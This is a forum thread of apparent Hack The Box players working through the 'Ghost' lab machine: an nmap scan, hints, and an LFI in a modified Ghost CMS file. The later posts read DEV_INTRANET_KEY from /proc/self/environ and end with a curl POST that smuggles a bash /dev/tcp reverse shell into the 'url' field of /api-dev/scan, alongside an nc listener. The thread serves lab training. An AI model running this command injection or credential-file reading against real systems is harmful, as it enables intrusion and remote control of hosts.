Posts: 12
Threads: 0
Joined: Oct 2023
(Jul 14, 2024, 04:13 AM)Dino43Dee Wrote: (root㉿kali)-[/home/kali/nmapAutomator]
└─# nmap -p- bitbucket.ghost.htb
Starting Nmap 7.94 ( https://nmap.org ) at 2024-07-14 04:10 UTC
Nmap scan report for bitbucket.ghost.htb (10.10.11.24)
Host is up (0.021s latency).
rDNS record for 10.10.11.24: ghost.htb
Not shown: 65508 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
443/tcp open https
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
1433/tcp open ms-sql-s
2179/tcp open vmrdp
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
3389/tcp open ms-wbt-server
5985/tcp open wsman
8008/tcp open http
8443/tcp open https-alt
9389/tcp open adws
49443/tcp open unknown
49664/tcp open unknown
49670/tcp open unknown
49674/tcp open unknown
55743/tcp open unknown
63247/tcp open unknown
63286/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 113.20 seconds
stop spamming, clown. nmap result already posted on page 1.
Posts: 103
Threads: 1
Joined: Nov 2023
guys any something hint for web shell ??T_T This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching | http://c66go4clkqodr7tdjfu76jztjs7w7d3fajdeypxn73v4ju3dt7g5yyyd.onion/Forum-Ban-Appeals if you feel this is incorrect.
Posts: 219
Threads: 14
Joined: Apr 2024
Jul 14, 2024, 05:53 AM
(This post was last modified: Jul 14, 2024, 06:03 AM by osamy7593.)
Guys rce in scan file from intranet or post.js from blog ... But i can't know the path to the file in the domains ..
Like in gitea repo scan.rs file .. I can't specify how can i reach it like htrp://ghost.htb/the file
Guys for initial foothold U need to send post request to /api-dev/scan with `x dev intranet key` and json data ur rev shell This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason:
Asking for rep is not allowed
Posts: 10
Threads: 0
Joined: Apr 2024
can some one provide us with the right api key 
Posts: 219
Threads: 14
Joined: Apr 2024
Jul 14, 2024, 06:43 AM
(This post was last modified: Jul 14, 2024, 07:13 AM by osamy7593.)
Our blog uses the Ghost CMS in a Docker container.
We are planning on adding additional features to the blog. One of them is a new connection to the intranet. For example, some posts will be featured on our intranet, or URLs from posts will be scanned by the intranet. However, this is still in development, so some features are behind an API key, shared between the intranet and the blog. It is named DEV_INTRANET_KEY and it is stored as an environment variable.
We modified a bit of the Ghost CMS source code to accomodate such new features. One example is the posts-public.js file, which allows us to extract additional information about the posts. In the future we should move the information to the database so that we don't accidentally lose data on container recreation. Make sure to replace the file when running, or just use the provided Dockerfile.
Also, the public API in Ghost needs an API key. We can write it here since it only allows access to public data: a5af628828958c976a3b6cc81a
guys lfi to read the correct api key ........ http://ghost.htb:8008/ghost/api/v3/conte...38c83aaca6This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason:
Asking for rep is not allowed
Posts: 124
Threads: 1
Joined: Apr 2024
(Jul 14, 2024, 06:43 AM)osamy7593 Wrote: Our blog uses the Ghost CMS in a Docker container.
We are planning on adding additional features to the blog. One of them is a new connection to the intranet. For example, some posts will be featured on our intranet, or URLs from posts will be scanned by the intranet. However, this is still in development, so some features are behind an API key, shared between the intranet and the blog. It is named DEV_INTRANET_KEY and it is stored as an environment variable.
We modified a bit of the Ghost CMS source code to accomodate such new features. One example is the posts-public.js file, which allows us to extract additional information about the posts. In the future we should move the information to the database so that we don't accidentally lose data on container recreation. Make sure to replace the file when running, or just use the provided Dockerfile.
Also, the public API in Ghost needs an API key. We can write it here since it only allows access to public data: a5af628828958c976a3b6cc81a
guys lfi to read the correct api key ........ http://ghost.htb:8008/ghost/api/v3/conte...38c83aaca6
How did you found this?
Posts: 219
Threads: 14
Joined: Apr 2024
files in gitea .. post.js tells that there is lfi This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason:
Asking for rep is not allowed
Posts: 57
Threads: 1
Joined: Apr 2024
(Jul 14, 2024, 06:43 AM)osamy7593 Wrote: Our blog uses the Ghost CMS in a Docker container.
We are planning on adding additional features to the blog. One of them is a new connection to the intranet. For example, some posts will be featured on our intranet, or URLs from posts will be scanned by the intranet. However, this is still in development, so some features are behind an API key, shared between the intranet and the blog. It is named DEV_INTRANET_KEY and it is stored as an environment variable.
We modified a bit of the Ghost CMS source code to accomodate such new features. One example is the posts-public.js file, which allows us to extract additional information about the posts. In the future we should move the information to the database so that we don't accidentally lose data on container recreation. Make sure to replace the file when running, or just use the provided Dockerfile.
Also, the public API in Ghost needs an API key. We can write it here since it only allows access to public data: a5af628828958c976a3b6cc81a
guys lfi to read the correct api key ........ http://ghost.htb:8008/ghost/api/v3/conte...38c83aaca6
Thanks, good find. You can get the DEV_INTRANET_KEY from /proc/self/environ:
http://ghost.htb:8008/ghost/api/v3/conte...38c83aaca6
Posts: 219
Threads: 14
Joined: Apr 2024
(Jul 14, 2024, 07:29 AM)ritualist Wrote: (Jul 14, 2024, 06:43 AM)osamy7593 Wrote: Our blog uses the Ghost CMS in a Docker container.
We are planning on adding additional features to the blog. One of them is a new connection to the intranet. For example, some posts will be featured on our intranet, or URLs from posts will be scanned by the intranet. However, this is still in development, so some features are behind an API key, shared between the intranet and the blog. It is named DEV_INTRANET_KEY and it is stored as an environment variable.
We modified a bit of the Ghost CMS source code to accomodate such new features. One example is the posts-public.js file, which allows us to extract additional information about the posts. In the future we should move the information to the database so that we don't accidentally lose data on container recreation. Make sure to replace the file when running, or just use the provided Dockerfile.
Also, the public API in Ghost needs an API key. We can write it here since it only allows access to public data: a5af628828958c976a3b6cc81a
guys lfi to read the correct api key ........ http://ghost.htb:8008/ghost/api/v3/conte...38c83aaca6
Thanks, good find. You can get the DEV_INTRANET_KEY from /proc/self/environ:
http://ghost.htb:8008/ghost/api/v3/conte...38c83aaca6
thx bro This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason:
Asking for rep is not allowed
Posts: 219
Threads: 14
Joined: Apr 2024
for foothold nc -nlvp 4444
curl http://intranet.ghost.htb:8008/api-dev/scan -X POST -H 'X-DEV-INTRANET-KEY: !@yqr!X2kxmQ.@Xe' -H 'Content-Type: application/json' -d '{"url": "0<&196;exec 196<>/dev/tcp/10.10.x.x/4444; /bin/bash <&196 >&196 2>&196"}' This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason:
Asking for rep is not allowed
|
